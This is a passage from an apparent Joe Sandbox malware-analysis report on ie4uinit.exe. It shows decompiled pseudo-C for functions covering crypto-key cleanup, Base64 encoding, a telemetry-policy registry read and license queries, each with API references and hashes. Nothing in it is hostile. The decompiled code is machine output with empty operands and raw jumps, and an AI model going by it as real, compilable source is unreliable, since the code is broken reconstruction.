				_t117 = __r8;
				if (E00007FF77FF7319D2420(_t64, __rdx, _t81,  *((intOrPtr*)(__rdx)), __rsi, __r8) == 0) goto 0x319d2302;
				goto 0x319d2405;
				_t108 =  &_v40;
				_v32 = _v32 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_t40 = E00007FF77FF7319C69CC(1, _t77,  &_v32, _t98, _t108, __r9);
				if ((0x80000000 & __rdi + _t73) != 0) goto 0x319d2335;
				if (_t40 != 0x80070002) goto 0x319d2403;
				_t59 =  >  ? r9d : _v40 + 1;
				_t74 =  <  ? 0xffffffff : _t73;
				E00007FF77FF7319C1670();
				if (_t74 == 0) goto 0x319d23f1;
				 *_t74 = _t117;
				_t70 = ( >  ? r9d : _v40 + 1) - 1;
				if (_t70 <= 0) goto 0x319d2394;
				_t19 = _t74 + 8; // 0x8
				_t93 = _t19;
				r8d = 0;
				_t20 = _t96 - 1; // 0x0
				r9d = _t20;
				 *_t93 =  *((intOrPtr*)(_t108 + _v32));
				_t94 = _t93 + 8;
				if (_t70 != 0) goto 0x319d237b;
				__imp__#677();
				if (8 *  *_t77 < 0) goto 0x319d23e7;
				_v56 = _v36;
				_t30 = _t94 + 2; // 0x4
				r8d = _t30;
				__imp__#654();
				GetProcessHeap();
				HeapFree(_t101, ??);
				E00007FF77FF7319C1698(_v32, _t74);
				goto 0x319d23f6;
				r8d = _v40;
				E00007FF77FF7319D24A0(_v32, _v24, _v32, _t74);
				return 0x8007000e;
			}

0x7ff7319d22c8
0x7ff7319d22c8
0x7ff7319d22c8
0x7ff7319d22cb
0x7ff7319d22cf
0x7ff7319d22d3
0x7ff7319d22d7
0x7ff7319d22e3
0x7ff7319d22ec
0x7ff7319d22f6
0x7ff7319d22fd
0x7ff7319d2305
0x7ff7319d2309
0x7ff7319d2312
0x7ff7319d2316
0x7ff7319d2327
0x7ff7319d232f
0x7ff7319d2341
0x7ff7319d2350
0x7ff7319d2357
0x7ff7319d2362
0x7ff7319d2368
0x7ff7319d236b
0x7ff7319d236e
0x7ff7319d2370
0x7ff7319d2370
0x7ff7319d2374
0x7ff7319d2377
0x7ff7319d2377
0x7ff7319d2387
0x7ff7319d238a
0x7ff7319d2392
0x7ff7319d23a4
0x7ff7319d23ae
0x7ff7319d23bf
0x7ff7319d23c3
0x7ff7319d23c3
0x7ff7319d23c7
0x7ff7319d23d3
0x7ff7319d23e1
0x7ff7319d23ea
0x7ff7319d23ef
0x7ff7319d23f6
0x7ff7319d23fe
0x7ff7319d241e

APIs

Part of subcall function 00007FF7319D2420: StrCmpW.SHLWAPI(?,?,00000001,00007FF7319D22F4), ref: 00007FF7319D246A

#677.IERTUTIL ref: 00007FF7319D23A4
#654.IERTUTIL ref: 00007FF7319D23C7
GetProcessHeap.KERNEL32 ref: 00007FF7319D23D3
HeapFree.KERNEL32 ref: 00007FF7319D23E1

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$#654#677FreeProcess
String ID:
API String ID: 3027164600-0
Opcode ID: a0228dd2ef2ccff598f40f94b0f617d58f17ac72c7ca0d61ca9366e7715a55d6
Instruction ID: b7015c2ca27b51c3ec5b4c5ccad78193df4c78c0036268042050c22ee093729f
Opcode Fuzzy Hash: a0228dd2ef2ccff598f40f94b0f617d58f17ac72c7ca0d61ca9366e7715a55d6
Instruction Fuzzy Hash: 68417D73F08A9296EB009B65D4042ACB3A1FB88F98F884132DE5C5B798CF7CE441D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D56A4 Relevance: 6.1, APIs: 4, Instructions: 59
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7319D56A4(void* __edx, signed int __rbx, void* __rcx, long long __rsi, long long __rbp, signed int* __r8, long long _a8, signed int _a16, long long _a24, long long _a32) {
				signed int _v24;
				signed short _t17;
				void* _t22;
				signed int _t37;
				signed long long* _t44;

				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t44 = __r8;
				if (__edx != 0) goto 0x319d56ce;
				goto 0x319d5766;
				_t37 =  &_a16;
				 *__r8 =  *__r8 & __rbx;
				r9d = 0;
				_a16 = _a16 & 0;
				r8d = 0x40000001;
				_v24 = _t37;
				__imp__CryptBinaryToStringA();
				if (0x80070057 == 0) goto 0x319d5750;
				E00007FF77FF7319C1670();
				 *__r8 = _t37;
				if (_t37 == 0) goto 0x319d5749;
				_v24 =  &_a16;
				r8d = 0x40000001;
				__imp__CryptBinaryToStringA();
				if (0x80070057 != 0) goto 0x319d5764;
				_t22 =  <=  ? GetLastError() : _t15 & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698(_t37,  *__r8);
				 *_t44 =  *_t44 & 0x00000000;
				goto 0x319d5764;
				goto 0x319d5764;
				_t17 = GetLastError();
				_t26 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
				_t18 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
				return  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
			}

0x7ff7319d56a4
0x7ff7319d56a9
0x7ff7319d56ae
0x7ff7319d56b8
0x7ff7319d56c2
0x7ff7319d56c9
0x7ff7319d56d0
0x7ff7319d56d5
0x7ff7319d56d8
0x7ff7319d56db
0x7ff7319d56df
0x7ff7319d56e5
0x7ff7319d56ea
0x7ff7319d56f2
0x7ff7319d56f8
0x7ff7319d56fd
0x7ff7319d5703
0x7ff7319d570d
0x7ff7319d5712
0x7ff7319d571d
0x7ff7319d5725
0x7ff7319d573b
0x7ff7319d573e
0x7ff7319d5743
0x7ff7319d5747
0x7ff7319d574e
0x7ff7319d5750
0x7ff7319d5761
0x7ff7319d5764
0x7ff7319d577a

APIs

CryptBinaryToStringA.CRYPT32 ref: 00007FF7319D56EA
CryptBinaryToStringA.CRYPT32 ref: 00007FF7319D571D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D5727

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: BinaryCryptString$ErrorLast
String ID:
API String ID: 1952235381-0
Opcode ID: 78d356d05688388b1fc995cd7e19392f7fea885e563c701190838725c4503d30
Instruction ID: 3a0da6a0d1ebcf9a4684dc6533e54280893b487f76d2826567dc1c7346ce25fa
Opcode Fuzzy Hash: 78d356d05688388b1fc995cd7e19392f7fea885e563c701190838725c4503d30
Instruction Fuzzy Hash: F421C532F0CB82D6E710AB55E58437AA3A0BB44B98FA44134DB8C87658EF6DD4509720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DEBE0 Relevance: 6.0, APIs: 4, Instructions: 40
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319DEBE0(void* __rcx) {
				void* _t34;
				void* _t35;

				 *(__rcx + 0x48) =  *(__rcx + 0x48) & 0x00000000;
				_t35 = __rcx;
				 *(__rcx + 0x70) =  *(__rcx + 0x70) & 0x00000000;
				if ( *((intOrPtr*)(__rcx + 0x60)) == 0) goto 0x319dec04;
				E00007FF77FF7319C1698(_t34,  *((intOrPtr*)(__rcx + 0x60)));
				 *(_t35 + 0x60) =  *(_t35 + 0x60) & 0x00000000;
				if ( *(_t35 + 0x68) == 0) goto 0x319dec17;
				E00007FF77FF7319C1698(_t34,  *(_t35 + 0x68));
				 *(_t35 + 0x68) =  *(_t35 + 0x68) & 0x00000000;
				if ( *(_t35 + 0x40) == 0) goto 0x319dec2b;
				__imp__CryptDestroyKey();
				 *(_t35 + 0x40) =  *(_t35 + 0x40) & 0x00000000;
				if ( *(_t35 + 0x50) == 0) goto 0x319dec3f;
				__imp__CryptDestroyKey();
				 *(_t35 + 0x50) =  *(_t35 + 0x50) & 0x00000000;
				if ( *(_t35 + 0x58) == 0) goto 0x319dec53;
				__imp__CryptDestroyKey();
				 *(_t35 + 0x58) =  *(_t35 + 0x58) & 0x00000000;
				if ( *(_t35 + 0x38) == 0) goto 0x319dec69;
				__imp__CryptReleaseContext();
				 *(_t35 + 0x38) =  *(_t35 + 0x38) & 0x00000000;
				return 0;
			}

0x7ff7319debe6
0x7ff7319debea
0x7ff7319debed
0x7ff7319debf8
0x7ff7319debfa
0x7ff7319debff
0x7ff7319dec0b
0x7ff7319dec0d
0x7ff7319dec12
0x7ff7319dec1e
0x7ff7319dec20
0x7ff7319dec26
0x7ff7319dec32
0x7ff7319dec34
0x7ff7319dec3a
0x7ff7319dec46
0x7ff7319dec48
0x7ff7319dec4e
0x7ff7319dec5a
0x7ff7319dec5e
0x7ff7319dec64
0x7ff7319dec70

APIs

CryptDestroyKey.ADVAPI32 ref: 00007FF7319DEC20
CryptDestroyKey.ADVAPI32 ref: 00007FF7319DEC34
CryptDestroyKey.ADVAPI32 ref: 00007FF7319DEC48
CryptReleaseContext.ADVAPI32 ref: 00007FF7319DEC5E

Part of subcall function 00007FF7319C1698: GetProcessHeap.KERNEL32 ref: 00007FF7319C16A5
Part of subcall function 00007FF7319C1698: HeapFree.KERNEL32 ref: 00007FF7319C16B3

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Crypt$Destroy$Heap$ContextFreeProcessRelease
String ID:
API String ID: 4130806261-0
Opcode ID: 8a00a3ff903416d7b0f59f5c999b27ac69b7c41e41eea4974ae6d114375c7343
Instruction ID: 3c11a41ce848bf6ecfb5a1c5c8d84f3d3eb0a89b0a2704486eb65cae49a56420
Opcode Fuzzy Hash: 8a00a3ff903416d7b0f59f5c999b27ac69b7c41e41eea4974ae6d114375c7343
Instruction Fuzzy Hash: 69111832E1A6859AFF56AF74C0A93396361EF44F0DF444534C90A49548CFBD9455D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DDBC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
nativeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00007FF77FF7319DDBC4(char* __rcx, void _a8, signed int _a16, char _a24, signed int _a32) {
				char _v72;
				long long _v88;
				void* __rbx;
				void* __rsi;
				void* _t25;
				signed int _t27;
				void* _t41;
				void* _t43;
				long long _t62;
				long long _t64;
				void* _t72;
				long long _t73;
				char* _t81;

				_t81 = __rcx;
				_t25 = E00007FF77FF7319DFDB4(_t64,  &_a24,  &_a8, _t73);
				_t3 = _t73 + 1; // 0x1
				r12d = _t3;
				if (_t25 < 0) goto 0x319ddc50;
				_a16 = _a16 & 0;
				if (_a8 - r12d > 0) goto 0x319ddc52;
				if (E00007FF77FF7319DF9DC(_t62, _t64,  &_a24,  &_a16) < 0) goto 0x319ddc52;
				if (_a16 != 0) goto 0x319ddc52;
				_a8 = 3;
				_t27 = E00007FF77FF7319DF988(_t26,  &_a8, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\DataCollection", L"AllowTelemetry");
				if (_t27 != 0x80070002) goto 0x319ddc40;
				goto 0x319ddc56;
				if (_t27 < 0) goto 0x319ddc89;
				_t41 =  <  ? _a8 : _a24;
				goto 0x319ddc52;
				if (0 < 0) goto 0x319ddcac;
				if (0 != 0) goto 0x319ddc89;
				_a32 = _a32 & 0;
				_t17 = _t72 + 4; // 0x7
				r9d = _t17;
				_v72 = r9d;
				_v88 =  &_v72;
				__imp__NtQueryLicenseValue();
				_t43 =  !=  ? r12d : 0;
				if (0 < 0) goto 0x319ddcac;
				if (_t43 == 0) goto 0x319ddc9b;
				if (_t43 == r12d) goto 0x319ddc9b;
				if (0 < 0) goto 0x319ddcac;
				 *_t81 = _t27 & 0xffffff00 | ( !(2 >> 1) & r12d) == 0x00000000;
				return 0;
			}

0x7ff7319ddbd4
0x7ff7319ddbe1
0x7ff7319ddbe6
0x7ff7319ddbe6
0x7ff7319ddbee
0x7ff7319ddbf0
0x7ff7319ddbfa
0x7ff7319ddc07
0x7ff7319ddc0c
0x7ff7319ddc15
0x7ff7319ddc2e
0x7ff7319ddc3a
0x7ff7319ddc3e
0x7ff7319ddc42
0x7ff7319ddc4a
0x7ff7319ddc4e
0x7ff7319ddc54
0x7ff7319ddc58
0x7ff7319ddc5a
0x7ff7319ddc5d
0x7ff7319ddc5d
0x7ff7319ddc65
0x7ff7319ddc6d
0x7ff7319ddc7b
0x7ff7319ddc85
0x7ff7319ddc8b
0x7ff7319ddc8f
0x7ff7319ddc94
0x7ff7319ddc9f
0x7ff7319ddcaf
0x7ff7319ddcc0

APIs

Part of subcall function 00007FF7319DFDB4: LoadLibraryExW.KERNEL32 ref: 00007FF7319DFE2D
Part of subcall function 00007FF7319DFDB4: GetProcAddress.KERNEL32 ref: 00007FF7319DFE45
Part of subcall function 00007FF7319DFDB4: NtQueryLicenseValue.NTDLL ref: 00007FF7319DFE71
Part of subcall function 00007FF7319DFDB4: FreeLibrary.KERNEL32 ref: 00007FF7319DFEE1

NtQueryLicenseValue.NTDLL ref: 00007FF7319DDC7B

Part of subcall function 00007FF7319DF9DC: LoadLibraryExW.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA0E
Part of subcall function 00007FF7319DF9DC: GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA26
Part of subcall function 00007FF7319DF9DC: GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA39
Part of subcall function 00007FF7319DF9DC: FreeLibrary.KERNEL32 ref: 00007FF7319DFB7E

Part of subcall function 00007FF7319DF988: RegGetValueW.ADVAPI32 ref: 00007FF7319DF9C1

Strings

AllowTelemetry, xrefs: 00007FF7319DDC0E
Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00007FF7319DDC1C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Library$AddressProcValue$FreeLicenseLoadQuery
String ID: AllowTelemetry$Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection
API String ID: 1629355636-1682735051
Opcode ID: 8268b63e672efe111997523745741943a386734e04c4eab3cbdef3fce30538bf
Instruction ID: 9b4b58c1ff3f5342dc1122613c64d6c2f28709519e509f34e2e332b1697710e4
Opcode Fuzzy Hash: 8268b63e672efe111997523745741943a386734e04c4eab3cbdef3fce30538bf
Instruction Fuzzy Hash: 0C318323E04692EEE710AE708C845A9A7E1BF5036CFD14131EA09429CDDFF9E586D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E16EC Relevance: 4.6, APIs: 3, Instructions: 123commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,?,00000000,80004005,?,00007FF7319D64BB), ref: 00007FF7319E178A
SysAllocString.OLEAUT32 ref: 00007FF7319E17CA
SysFreeString.OLEAUT32 ref: 00007FF7319E1871

Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C148B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$AllocCreateFreeInstance
String ID:
API String ID: 391255401-0
Opcode ID: 9f5a7867588a1d356f2c9ec481783404344dcf548f82df50331e6da7667de960
Instruction ID: ddf67fb100cac2bced8ac7ad31386bf0ca83b592f5ee0c6bdd1fddfa52febfcd
Opcode Fuzzy Hash: 9f5a7867588a1d356f2c9ec481783404344dcf548f82df50331e6da7667de960
Instruction Fuzzy Hash: 4E510A2AA09B86A2EB14EF16E854129E760FF84F98B858431CE4D43768CFBDE445D371

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C329C Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7319C32E2
GetVersionExA.KERNEL32 ref: 00007FF7319C32EC

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Versionmemset
String ID:
API String ID: 3136939366-0
Opcode ID: f26bee8d05a445e1c7e8155c44e4478685e11a1403462e41dbe05f32c3ee5bcb
Instruction ID: c435ed0317d59b375b53f8eb766a713435a10c1c1b9afe84c03f4620dedb7de2
Opcode Fuzzy Hash: f26bee8d05a445e1c7e8155c44e4478685e11a1403462e41dbe05f32c3ee5bcb
Instruction Fuzzy Hash: 9D218122E28AC2A2E7609B21E4547AEB3A0FB89744FC54135EACD4375DDF7CD504DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D25C0 Relevance: 3.1, APIs: 2, Instructions: 60
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7319D25C0(signed long long* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				intOrPtr _v24;
				void* _t37;
				signed long long* _t46;

				_a8 = __rbx;
				_a16 = __rsi;
				_t37 = __rcx;
				E00007FF77FF7319C1670();
				if (__rax == 0) goto 0x319d260b;
				 *__rax =  *__rax & 0x00000000;
				r9d = 0x18;
				r8d = 0;
				_v24 = 0xf0000000;
				__imp__CryptAcquireContextW();
				goto 0x319d260d;
				 *((long long*)(__rcx + 8)) = __rax;
				if (__rax == 0) goto 0x319d2640;
				E00007FF77FF7319C1670();
				if (__rax == 0) goto 0x319d2631;
				_t35 =  *((intOrPtr*)(__rcx + 8));
				 *__rax =  *((intOrPtr*)(__rcx + 8));
				goto 0x319d2633;
				 *((long long*)(__rcx + 0x10)) = __rax;
				if (__rax == 0) goto 0x319d2640;
				goto 0x319d267d;
				if ( *((intOrPtr*)(__rcx + 0x10)) == 0) goto 0x319d264e;
				E00007FF77FF7319C1698( *((intOrPtr*)(__rcx + 8)),  *((intOrPtr*)(__rcx + 0x10)));
				 *(_t37 + 0x10) =  *(_t37 + 0x10) & 0x00000000;
				_t46 =  *(_t37 + 8);
				if (_t46 == 0) goto 0x319d2678;
				if ( *_t46 == 0) goto 0x319d2670;
				__imp__CryptReleaseContext();
				 *_t46 =  *_t46 & 0x00000000;
				E00007FF77FF7319C1698(_t35, _t46);
				 *(_t37 + 8) =  *(_t37 + 8) & 0x00000000;
				return 0;
			}

0x7ff7319d25c0
0x7ff7319d25c5
0x7ff7319d25cf
0x7ff7319d25dc
0x7ff7319d25e7
0x7ff7319d25e9
0x7ff7319d25ed
0x7ff7319d25f3
0x7ff7319d25f6
0x7ff7319d2603
0x7ff7319d2609
0x7ff7319d260d
0x7ff7319d2614
0x7ff7319d261b
0x7ff7319d2626
0x7ff7319d2628
0x7ff7319d262c
0x7ff7319d262f
0x7ff7319d2633
0x7ff7319d263a
0x7ff7319d263e
0x7ff7319d2647
0x7ff7319d2649
0x7ff7319d264e
0x7ff7319d2653
0x7ff7319d265a
0x7ff7319d2662
0x7ff7319d2666
0x7ff7319d266c
0x7ff7319d2673
0x7ff7319d2678
0x7ff7319d268e

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

CryptAcquireContextW.ADVAPI32 ref: 00007FF7319D2603
CryptReleaseContext.ADVAPI32 ref: 00007FF7319D2666

Part of subcall function 00007FF7319C1698: GetProcessHeap.KERNEL32 ref: 00007FF7319C16A5
Part of subcall function 00007FF7319C1698: HeapFree.KERNEL32 ref: 00007FF7319C16B3

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$ContextCryptProcess$AcquireFreeRelease
String ID:
API String ID: 3796240942-0
Opcode ID: f5e509d1d66287f27a15449c92e3f995700201e7c74088af193ba978adb063d0
Instruction ID: 9db70d579d9f6d3ec39f21e9a708d9375dd397d79ce6bfefcd5a9215ca53d92f
Opcode Fuzzy Hash: f5e509d1d66287f27a15449c92e3f995700201e7c74088af193ba978adb063d0
Instruction Fuzzy Hash: 0D218326E0978192FB55AF15D214339D3A0AF88B88F988535DA9D0B79CDFBCD8119360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D1F14 Relevance: 1.6, APIs: 1, Instructions: 86
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7319D1F14(signed int __ecx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __r8) {
				signed int _t20;
				signed int _t31;
				signed int _t33;
				signed long long _t54;
				intOrPtr _t59;
				long long _t61;
				struct _FILETIME* _t70;
				void* _t74;
				void* _t77;
				void* _t79;
				signed long long _t80;

				_t61 = __rbx;
				_t33 = __ecx;
				 *((long long*)(_t79 + 0x20)) = __rbx;
				_t80 = _t79 - 0x480;
				_t54 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t80 + 0x470) = _t54 ^ _t80;
				if (__rdx == 0) goto 0x319d2030;
				if (__rcx == 0) goto 0x319d1f6f;
				r9d = 0x104;
				if ( *0x319e7038(_t74, _t77) >= 0) goto 0x319d1f74;
				 *((short*)(_t80 + 0x50)) = 0;
				r9d = 0x104;
				_t59 =  *((intOrPtr*)( *__rdx + 0x48));
				if ( *0x319e7038() < 0) goto 0x319d2030;
				_t20 = E00007FF77FF7319CB0DC();
				if (_t20 != 3) goto 0x319d1fb7;
				asm("sbb ecx, ecx");
				_t31 = _t20 & _t33;
				if (E00007FF77FF7319DDD9C(_t33, _t20 - 3) == 0) goto 0x319d202e;
				E00007FF77FF7319DDD64(_t59, __rdx);
				if (_t59 == 0) goto 0x319d202e;
				GetSystemTimeAsFileTime(_t70);
				if (_t31 == 0) goto 0x319d2008;
				if (_t31 == 1) goto 0x319d2001;
				if (_t31 == 2) goto 0x319d1ffa;
				_t10 = _t61 - 3; // -3
				if (_t10 - 1 > 0) goto 0x319d200a;
				goto 0x319d200a;
				goto 0x319d200a;
				goto 0x319d200a;
				 *((long long*)(_t80 + 0x30)) = _t80 + 0x40;
				 *((long long*)(_t80 + 0x20)) = __r8;
				E00007FF77FF7319DCAA4(0, _t59, _t80 + 0x50, _t80 + 0x260);
				return E00007FF77FF7319E38D0(0, _t33,  *(_t80 + 0x470) ^ _t80);
			}

0x7ff7319d1f14
0x7ff7319d1f14
0x7ff7319d1f14
0x7ff7319d1f1c
0x7ff7319d1f23
0x7ff7319d1f2d
0x7ff7319d1f45
0x7ff7319d1f4e
0x7ff7319d1f58
0x7ff7319d1f6d
0x7ff7319d1f6f
0x7ff7319d1f7f
0x7ff7319d1f8d
0x7ff7319d1f99
0x7ff7319d1f9f
0x7ff7319d1fa9
0x7ff7319d1fb3
0x7ff7319d1fb5
0x7ff7319d1fbe
0x7ff7319d1fc0
0x7ff7319d1fcb
0x7ff7319d1fd2
0x7ff7319d1fdf
0x7ff7319d1fe4
0x7ff7319d1fe9
0x7ff7319d1feb
0x7ff7319d1ff1
0x7ff7319d1ff8
0x7ff7319d1fff
0x7ff7319d2006
0x7ff7319d2012
0x7ff7319d2024
0x7ff7319d2029
0x7ff7319d2054

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7319D1FD2

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 2feced8ed1a6935a059fb3f869a6a4bba4b34826cbadbfae715c7d99de840c20
Instruction ID: 27fc832aa75d4c06d71e11a3d5a3ebb4405c7b3b207fc59c34121d1e393ea833
Opcode Fuzzy Hash: 2feced8ed1a6935a059fb3f869a6a4bba4b34826cbadbfae715c7d99de840c20
Instruction Fuzzy Hash: 69319022E0C6C2A1FB20AB15D5483A9E351EF84788F944035DB4C4779DDFADE445D320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D2550 Relevance: 1.5, APIs: 1, Instructions: 29
encryptionCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7319D2550(long long __rbx, long long* __rcx, long long _a8) {
				void* _t7;
				signed long long* _t17;
				long long* _t23;

				_a8 = __rbx;
				_t23 = __rcx;
				 *__rcx = 0x319e52d8;
